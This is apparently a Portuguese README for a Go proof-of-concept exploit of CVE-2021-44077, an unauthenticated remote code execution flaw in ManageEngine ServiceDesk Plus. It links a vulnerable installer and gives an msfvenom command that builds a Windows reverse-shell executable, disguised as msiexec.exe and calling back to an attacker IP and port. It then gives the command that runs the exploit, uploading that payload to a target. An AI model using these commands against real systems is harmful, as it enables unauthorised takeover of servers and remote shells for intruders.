
Exploit de Prova de Conceito em Golang para CVE-2021-44077: RCE Pré-Autenticação no ManageEngine ServiceDesk Plus < 11306
Este exploit é uma RCE não autenticada no Zoho ManageEngine ServiceDesk Plus < 11306.
Você pode encontrar uma versão vulnerável do software aqui: http://archives.manageengine.com/service-desk/11303/ManageEngine_ServiceDesk_Plus_64bit.exe
Não consegui encontrar uma versão em Golang disso, então aqui está. Meu código não é ótimo, então prossiga por sua conta e risco.
Blog post:
Crie um payload malicioso no seu diretório atual.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > msiexec.exe
Então, execute o exploit.
go run CVE-2021-44077.go -u "http://192.168.1.3:8080/" -f "/msiexec.exe"
-u é a URL vulnerável -f é o seu arquivo malicioso